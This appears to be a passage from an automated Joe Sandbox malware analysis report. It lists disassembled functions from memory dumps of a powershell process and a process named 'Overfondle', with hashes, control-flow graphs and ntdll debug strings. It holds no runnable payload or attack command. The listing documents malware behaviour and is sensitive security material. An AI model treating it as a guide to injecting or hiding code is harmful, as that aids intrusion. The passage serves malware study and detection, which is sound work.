                                                                        • Snapshot File: hcaresult_2_2_33d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 29afc0214264d4efe84e8906ed65dcad007eb1314718f10610d03840818c20d0
                                                                        • Instruction ID: 16070192aea6400fc89b878c2386ccf50a4b2a0064178c9a931e2f07923a663d
                                                                        • Opcode Fuzzy Hash: 29afc0214264d4efe84e8906ed65dcad007eb1314718f10610d03840818c20d0
                                                                        • Instruction Fuzzy Hash: 7E319071A04605DFCB15CF59C9C49AAFBF5FF48310B288699E449AB756C732EC40CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 079614A7 Relevance: .1, Instructions: 83COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6afacd0b611fc25eaa7068fdbdcf5a2d6a099f34e29375b37aeba617783ddb43
                                                                        • Instruction ID: 478f001f4710ce700de62cbc22448ffba4dc7cd048d50f96a1dba834fe260a28
                                                                        • Opcode Fuzzy Hash: 6afacd0b611fc25eaa7068fdbdcf5a2d6a099f34e29375b37aeba617783ddb43
                                                                        • Instruction Fuzzy Hash: 46219BB13443896FD731467948157727FA99FC2218F248567E402DB3C7E979D880C372
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 079612B0 Relevance: .1, Instructions: 52COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: bb59b925ce67b263ca52231a3ea0f4a9509788825bb6953a628f6cd42abcff69
                                                                        • Instruction ID: 16d82d5eb3f87b12f9363a545290f54253446768cae1e8c1833a839efd1b4357
                                                                        • Opcode Fuzzy Hash: bb59b925ce67b263ca52231a3ea0f4a9509788825bb6953a628f6cd42abcff69
                                                                        • Instruction Fuzzy Hash: 6501767634022A9BC72449AAD40467AF7DADFC16ABF14C03BD54ACB610DA72C842C7A0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 033DB304 Relevance: .0, Instructions: 48COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064493981.00000000033D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 033D0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_33d0000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 6baf66c52b8be866be927d5040170979278fee31e54e932cb900471d9c2993fa
                                                                        • Instruction ID: e3fdfd4a1f083bd2e77d6ec3fc5604dc35d935e9ecc56b8021d8265595198d35
                                                                        • Opcode Fuzzy Hash: 6baf66c52b8be866be927d5040170979278fee31e54e932cb900471d9c2993fa
                                                                        • Instruction Fuzzy Hash: BF11B935A00209EFDB45CFA4D884A9DFBB2FF48314F298559E405AB365C771E882CB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0333D006 Relevance: .0, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064265018.000000000333D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0333D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_333d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: c79454009921bfe34fd6d847596c1fa1d281a0429ddb0957f3913b50eb09b076
                                                                        • Instruction ID: 798a8934bded128a2dfffde82d1f3d9a68b4ba68d9530b5b356fec93702ddcb2
                                                                        • Opcode Fuzzy Hash: c79454009921bfe34fd6d847596c1fa1d281a0429ddb0957f3913b50eb09b076
                                                                        • Instruction Fuzzy Hash: 4601807240D3C05FD7128B258C84792BFA8DF43624F0985CBE8848F1A3C26C5C45CB72
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0333D01D Relevance: .0, Instructions: 45COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064265018.000000000333D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0333D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_333d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 8e495027d294e8cb285a54cf717b977ed3ff9a665ce53043a056fb2d8804bc43
                                                                        • Instruction ID: 8f8c0ef7a9866f35ee0591d6526d1ea36c2327980d377edc2153e51087307b6f
                                                                        • Opcode Fuzzy Hash: 8e495027d294e8cb285a54cf717b977ed3ff9a665ce53043a056fb2d8804bc43
                                                                        • Instruction Fuzzy Hash: 4201F2324043449EF7208E21CCC4BA7FB9CEF42A24F08C15AED595E642C77C9881CAB2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 0333D7B8 Relevance: .1, Instructions: 75COMMON
                                                                        Download Yara Rule
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2064265018.000000000333D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0333D000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_333d000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: e0fec4f6444bf810dd56a589157cda31bd7e5e439bf1ce75fbd14f45886e7d1d
                                                                        • Instruction ID: 29155c963274417e62fd8bfa8d213440fe7539c4fc50fc3e860f7133e37aafbf
                                                                        • Opcode Fuzzy Hash: e0fec4f6444bf810dd56a589157cda31bd7e5e439bf1ce75fbd14f45886e7d1d
                                                                        • Instruction Fuzzy Hash: 36214672500304EFDB05DF14D9C0B26BB69FB89325F24C5ADE9090F666C336E456CBA2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0796EC80 Relevance: 5.5, Strings: 4, Instructions: 478COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.2070559539.0000000007960000.00000040.00000800.00020000.00000000.sdmp, Offset: 07960000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_7960000_powershell.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: l$l$l$l
                                                                        • API String ID: 0-2658161240
                                                                        • Opcode ID: beeb686be4f444a7c539e82f648da27dd73f4b3955b33bd7218f725e7440fd1d
                                                                        • Instruction ID: be8aae4895b13e7aac9a5269f27662c1e279bb7d0326ae3977cde95d10e036b8
                                                                        • Opcode Fuzzy Hash: beeb686be4f444a7c539e82f648da27dd73f4b3955b33bd7218f725e7440fd1d
                                                                        • Instruction Fuzzy Hash: 09F168B6B043068FDB259B68940976ABBF6AFC1718F24857BD406DB351DB32CC41CBA1
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Execution Graph

                                                                        Execution Coverage:0%
                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                        Signature Coverage:100%
                                                                        Total number of Nodes:1
                                                                        Total number of Limit Nodes:0
                                                                        execution_graph 45482 204a2c70 LdrInitializeThunk

                                                                        Executed Functions

                                                                        Function 204A35C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 2 204a35c0-204a35cc LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 6243c035071257fe522324d0451ee7cd4bfd3366e0e13722e6b9643618ba8d7d
                                                                        • Instruction ID: 160ddb650644586065b8bef7b165fb27d4cd3010d142e41f1c74db0f15a68496
                                                                        • Opcode Fuzzy Hash: 6243c035071257fe522324d0451ee7cd4bfd3366e0e13722e6b9643618ba8d7d
                                                                        • Instruction Fuzzy Hash: 5D900231A0550402D21071994954706100547E4201F65C417A0425568D87998A51A9B2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 204A2C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 204a2c70-204a2c7c LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 1ab644f861b114d660c3878690ed7230ae8cdb8334cb808cf977bb42488df93c
                                                                        • Instruction ID: d9d322255965072a75656966a239f5c2bc8d09a485767f20c2c8acb6cd33f173
                                                                        • Opcode Fuzzy Hash: 1ab644f861b114d660c3878690ed7230ae8cdb8334cb808cf977bb42488df93c
                                                                        • Instruction Fuzzy Hash: 1890023160148802D2207199884474A000547E4301F59C417A4425658D86998991B531
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 204A2DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1 204a2df0-204a2dfc LdrInitializeThunk
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: InitializeThunk
                                                                        • String ID:
                                                                        • API String ID: 2994545307-0
                                                                        • Opcode ID: 7c36b88e0929aa8ec7f11315872fb5c282b3c934cb7528dd57a8c3e29b105231
                                                                        • Instruction ID: ca6333541dd845002cdfec532a9bd4870f65f8c66b6405ec46a1f37da24bd57c
                                                                        • Opcode Fuzzy Hash: 7c36b88e0929aa8ec7f11315872fb5c282b3c934cb7528dd57a8c3e29b105231
                                                                        • Instruction Fuzzy Hash: 5B90023160140413D22171994944707000947E4241F95C417A0425558D965A8A52E531
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 204E2349 Relevance: 26.1, Strings: 20, Instructions: 1117COMMON
                                                                        Download Yara Rule
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: @$@$CFGOptions$DisableExceptionChainValidation$DisableHeapLookaside$ExecuteOptions$FrontEndHeapDebugOptions$GlobalFlag$GlobalFlag2$Initializing the application verifier package failed with status 0x%08lx$LdrpInitializeExecutionOptions$MaxDeadActivationContexts$MaxLoaderThreads$MinimumStackCommitInBytes$RaiseExceptionOnPossibleDeadlock$ShutdownFlags$TracingFlags$UnloadEventTraceDepth$UseImpersonatedDeviceMap$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 0-2160512332
                                                                        • Opcode ID: 86070ab00026a2e4131a25f012cd198ed5d24a1ab381a4080fcc7484b40ecc1c
                                                                        • Instruction ID: 5e279187f594f71556794e88d0e9b1fcd23ec58e319f0f76c747196014e516b9
                                                                        • Opcode Fuzzy Hash: 86070ab00026a2e4131a25f012cd198ed5d24a1ab381a4080fcc7484b40ecc1c
                                                                        • Instruction Fuzzy Hash: B792BE71604341AFE321CFA6C981F5BB7E8BB84759F10892DFA98D7250D778E844CB92
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 20498620 Relevance: 17.7, Strings: 14, Instructions: 223COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 540 20498620-20498681 541 204d5297-204d529d 540->541 542 20498687-20498698 540->542 541->542 543 204d52a3-204d52b0 GetPEB 541->543 543->542 544 204d52b6-204d52b9 543->544 545 204d52bb-204d52c5 544->545 546 204d52d6-204d52fc call 204a2ce0 544->546 545->542 547 204d52cb-204d52d4 545->547 546->542 551 204d5302-204d5306 546->551 549 204d532d-204d5341 call 204654a0 547->549 556 204d5347-204d5353 549->556 551->542 553 204d530c-204d5321 call 204a2ce0 551->553 553->542 560 204d5327 553->560 558 204d555c-204d5568 call 204d556d 556->558 559 204d5359-204d536d 556->559 558->542 562 204d536f 559->562 563 204d538b-204d5401 559->563 560->549 566 204d5371-204d5378 562->566 568 204d543a-204d543d 563->568 569 204d5403-204d5435 call 2045fd50 563->569 566->563 567 204d537a-204d537c 566->567 570 204d537e-204d5381 567->570 571 204d5383-204d5385 567->571 573 204d5514-204d5517 568->573 574 204d5443-204d5494 568->574 580 204d554d-204d5552 call 204ea4b0 569->580 570->566 571->563 575 204d5555-204d5557 571->575 573->575 576 204d5519-204d5548 call 2045fd50 573->576 581 204d54ce-204d5512 call 2045fd50 * 2 574->581 582 204d5496-204d54cc call 2045fd50 574->582 575->556 576->580 580->575 581->580 582->580
                                                                        Strings
                                                                        • Initialization stack trace. Use dps to dump it if non-NULL., xrefs: 204D540A, 204D5496, 204D5519
                                                                        • Critical section debug info address, xrefs: 204D541F, 204D552E
                                                                        • double initialized or corrupted critical section, xrefs: 204D5508
                                                                        • undeleted critical section in freed memory, xrefs: 204D542B
                                                                        • Address of the debug info found in the active list., xrefs: 204D54AE, 204D54FA
                                                                        • Critical section address, xrefs: 204D5425, 204D54BC, 204D5534
                                                                        • corrupted critical section, xrefs: 204D54C2
                                                                        • Critical section address., xrefs: 204D5502
                                                                        • First initialization stack trace. Use dps to dump it if non-NULL., xrefs: 204D54E2
                                                                        • Thread is in a state in which it cannot own a critical section, xrefs: 204D5543
                                                                        • Second initialization stack trace. Use dps to dump it if non-NULL., xrefs: 204D54CE
                                                                        • Invalid debug info address of this critical section, xrefs: 204D54B6
                                                                        • 8, xrefs: 204D52E3
                                                                        • Thread identifier, xrefs: 204D553A
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                        • API String ID: 0-2368682639
                                                                        • Opcode ID: e1f11b61f5f66eab45fa7a2e60c80e872d3f92e4f70611a3f731d286a16627de
                                                                        • Instruction ID: 5c20a539716ff62d026340d1fe72503171996f52a2df7457f8cf43e6e4335e59
                                                                        • Opcode Fuzzy Hash: e1f11b61f5f66eab45fa7a2e60c80e872d3f92e4f70611a3f731d286a16627de
                                                                        • Instruction Fuzzy Hash: 07815AB1D00298AFEB10CFD8C894F9EBBB5BB18718F208159F905B7B40D779A945CB51
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 20510274 Relevance: 16.1, APIs: 1, Strings: 8, Instructions: 348timeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 697 20510274-20510296 call 204b7e54 700 205102b5-205102cd call 204576b2 697->700 701 20510298-205102b0 RtlDebugPrintTimes 697->701 706 205102d3-205102e9 700->706 707 205106f7 700->707 705 20510751-20510760 701->705 709 205102f0-205102f2 706->709 710 205102eb-205102ee 706->710 708 205106fa-2051074e call 20510766 707->708 708->705 712 205102f3-2051030a 709->712 710->712 714 205106b1-205106ba GetPEB 712->714 715 20510310-20510313 712->715 717 205106d9-205106de call 2045b970 714->717 718 205106bc-205106d7 GetPEB call 2045b970 714->718 715->714 719 20510319-20510322 715->719 727 205106e3-205106f4 call 2045b970 717->727 718->727 720 20510324-2051033b call 2046ffb0 719->720 721 2051033e-20510351 call 20510cb5 719->721 720->721 731 20510353-2051035a 721->731 732 2051035c-20510370 call 2045758f 721->732 727->707 731->732 736 205105a2-205105a7 732->736 737 20510376-20510382 GetPEB 732->737 736->708 740 205105ad-205105b9 GetPEB 736->740 738 205103f0-205103fb 737->738 739 20510384-20510387 737->739 741 20510401-20510408 738->741 742 205104e8-205104fa call 204727f0 738->742 743 205103a6-205103ab call 2045b970 739->743 744 20510389-205103a4 GetPEB call 2045b970 739->744 745 20510627-20510632 740->745 746 205105bb-205105be 740->746 741->742 749 2051040e-20510417 741->749 765 20510590-2051059d call 205111a4 call 20510cb5 742->765 766 20510500-20510507 742->766 755 205103b0-205103d1 call 2045b970 GetPEB 743->755 744->755 745->708 750 20510638-20510643 745->750 752 205105c0-205105db GetPEB call 2045b970 746->752 753 205105dd-205105e2 call 2045b970 746->753 758 20510419-20510429 749->758 759 20510438-2051043c 749->759 750->708 760 20510649-20510654 750->760 764 205105e7-205105fb call 2045b970 752->764 753->764 755->742 784 205103d7-205103eb 755->784 758->759 767 2051042b-20510435 call 2051dac6 758->767 769 2051044e-20510454 759->769 770 2051043e-2051044c call 20493bc9 759->770 760->708 768 2051065a-20510663 GetPEB 760->768 795 205105fe-20510608 GetPEB 764->795 765->736 774 20510512-2051051a 766->774 775 20510509-20510510 766->775 767->759 778 20510682-20510687 call 2045b970 768->778 779 20510665-20510680 GetPEB call 2045b970 768->779 771 20510457-20510460 769->771 770->771 782 20510472-20510475 771->782 783 20510462-20510470 771->783 786 20510538-2051053c 774->786 787 2051051c-2051052c 774->787 775->774 792 2051068c-205106ac call 205086ba call 2045b970 778->792 779->792 793 205104e5 782->793 794 20510477-2051047e 782->794 783->782 784->742 798 2051056c-20510572 786->798 799 2051053e-20510551 call 20493bc9 786->799 787->786 796 2051052e-20510533 call 2051dac6 787->796 792->795 793->742 794->793 802 20510480-2051048b 794->802 795->708 804 2051060e-20510622 795->804 796->786 803 20510575-2051057c 798->803 811 20510563 799->811 812 20510553-20510561 call 2048fe99 799->812 802->793 808 2051048d-20510496 GetPEB 802->808 803->765 809 2051057e-2051058e 803->809 804->708 814 205104b5-205104ba call 2045b970 808->814 815 20510498-205104b3 GetPEB call 2045b970 808->815 809->765 817 20510566-2051056a 811->817 812->817 823 205104bf-205104dd call 205086ba call 2045b970 814->823 815->823 817->803 823->793
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                        • API String ID: 3446177414-1700792311
                                                                        • Opcode ID: 728afd873c4118da679210a5b9c966b4f1953e8c63cee183a26c7db945822c46
                                                                        • Instruction ID: 174bdc58f8680f138c3ed64176c7236a223cb438dbb46ec7df27b67aa2176c25
                                                                        • Opcode Fuzzy Hash: 728afd873c4118da679210a5b9c966b4f1953e8c63cee183a26c7db945822c46
                                                                        • Instruction Fuzzy Hash: 2BD1CA71500684DFEB02CFE8C481AADFFF2FF6A608F149459E545AB252C7B89985CF50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 204929F9 Relevance: 14.2, Strings: 11, Instructions: 411COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 1042 204929f9-20492a73 1043 20492a79-20492a7b 1042->1043 1044 204d261b-204d2634 call 204ef290 1042->1044 1045 204d2618 1043->1045 1046 20492a81-20492a84 1043->1046 1053 204d263e-204d2649 call 2045bae0 1044->1053 1045->1044 1046->1045 1048 20492a8a-20492a8d 1046->1048 1048->1045 1050 20492a93-20492a99 1048->1050 1051 20492a9f-20492ac0 1050->1051 1052 20492cc7-20492cd7 call 204a4c30 1050->1052 1056 204d22e2-204d22f5 call 204ef290 1051->1056 1057 20492ac6-20492aca 1051->1057 1068 204d264e-204d2659 call 204a2b60 1053->1068 1060 204d22ff-204d2310 1056->1060 1057->1060 1061 20492ad0-20492b4b call 20492cf0 1057->1061 1065 204d231c-204d2328 call 204aa9f0 1060->1065 1066 204d2312-204d2317 1060->1066 1072 20492b51-20492b58 1061->1072 1073 204d23c3 1061->1073 1074 204d232a 1065->1074 1075 204d2334-204d2353 1065->1075 1066->1052 1086 204d265e-204d266f GetPEB call 20473ca0 1068->1086 1077 204d23cd-204d23ff call 20492f98 1072->1077 1078 20492b5e-20492b81 1072->1078 1073->1077 1074->1075 1080 204d2355-204d236a call 20475e40 1075->1080 1081 204d2384 1075->1081 1090 204d2428-204d2443 call 20492e9c 1077->1090 1091 204d2401-204d240e 1077->1091 1082 20492c3b 1078->1082 1083 20492b87-20492bcd call 20492cf0 1078->1083 1101 204d236c 1080->1101 1102 204d2376-204d2382 1080->1102 1088 204d238a-204d23bb call 204a89a0 1081->1088 1087 20492c3d 1082->1087 1098 204d24ae-204d24b3 1083->1098 1099 20492bd3-20492be1 1083->1099 1086->1052 1094 204d24b8-204d24d1 call 204ef290 1087->1094 1095 20492c43-20492c4a 1087->1095 1088->1073 1124 204d2445 1090->1124 1125 204d2410-204d2412 1090->1125 1100 204d2417-204d2420 call 204ef290 1091->1100 1104 204d24db-204d24fb call 20481cf0 1094->1104 1095->1104 1105 20492c50-20492c6e call 20492e9c 1095->1105 1114 20492c7f-20492c9a call 20492cf0 1098->1114 1109 204d244c-204d244f 1099->1109 1110 20492be7-20492bea 1099->1110 1100->1090 1101->1102 1102->1088 1129 204d24fd-204d251c call 204ef290 1104->1129 1130 204d2521-204d2536 1104->1130 1132 204d2601-204d2610 call 204ef290 1105->1132 1133 20492c74 1105->1133 1109->1094 1118 204d2451-204d2454 1109->1118 1119 20492cda-20492cdd 1110->1119 1120 20492bf0-20492bf7 1110->1120 1126 20492c9f-20492ca6 1114->1126 1127 204d245f-204d246a call 204a2b60 1118->1127 1119->1087 1131 20492ce3-20492ce9 1119->1131 1120->1127 1128 20492bfd-20492c2f call 20492f98 1120->1128 1124->1109 1125->1100 1126->1053 1134 20492cac-20492cb3 1126->1134 1148 204d2476-204d247c 1127->1148 1128->1148 1149 20492c35 1128->1149 1141 20492c76-20492c7d 1129->1141 1139 204d2538-204d2550 1130->1139 1140 204d2552 1130->1140 1131->1083 1132->1045 1133->1141 1134->1068 1142 20492cb9-20492cc1 1134->1142 1147 204d2554-204d25b5 call 204a2dc0 1139->1147 1140->1147 1141->1114 1141->1126 1142->1052 1142->1086 1155 204d25d9-204d25db 1147->1155 1156 204d25b7-204d25be 1147->1156 1151 204d247e-204d2484 1148->1151 1152 204d2489-204d24a9 call 204ef290 1148->1152 1149->1082 1151->1119 1152->1114 1155->1105 1157 204d25e1-204d25fc call 204ef290 1155->1157 1156->1155 1159 204d25c0-204d25d4 call 204a2b60 GetPEB call 20473ca0 1156->1159 1157->1141 1159->1155
                                                                        Strings
                                                                        • RtlpResolveAssemblyStorageMapEntry, xrefs: 204D261F
                                                                        • @, xrefs: 204D259B
                                                                        • SXS: Assembly directory name stored in assembly information too long (%lu bytes) - ACTIVATION_CONTEXT_DATA at %p, xrefs: 204D22E4
                                                                        • SXS: Storage resolution failed to insert entry to storage map; Status = 0x%08lx, xrefs: 204D2602
                                                                        • SXS: %s() bad parametersSXS: Map : %pSXS: Data : %pSXS: AssemblyRosterIndex: 0x%lxSXS: Map->AssemblyCount : 0x%lx, xrefs: 204D2624
                                                                        • SXS: Attempt to insert well known storage root into assembly storage map assembly roster index %lu failed; Status = 0x%08lx, xrefs: 204D2412
                                                                        • SXS: Attempt to probe known root of assembly storage ("%wZ") failed; Status = 0x%08lx, xrefs: 204D2409
                                                                        • SXS: Attempt to probe assembly storage root %wZ for assembly directory %wZ failed with status = 0x%08lx, xrefs: 204D2498
                                                                        • SXS: Unable to open assembly directory under storage root "%S"; Status = 0x%08lx, xrefs: 204D25EB
                                                                        • SXS: Unable to resolve storage root for assembly directory %wZ in %Iu tries, xrefs: 204D24C0
                                                                        • SXS: Attempt to translate DOS path name "%S" to NT format failed, xrefs: 204D2506
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID:
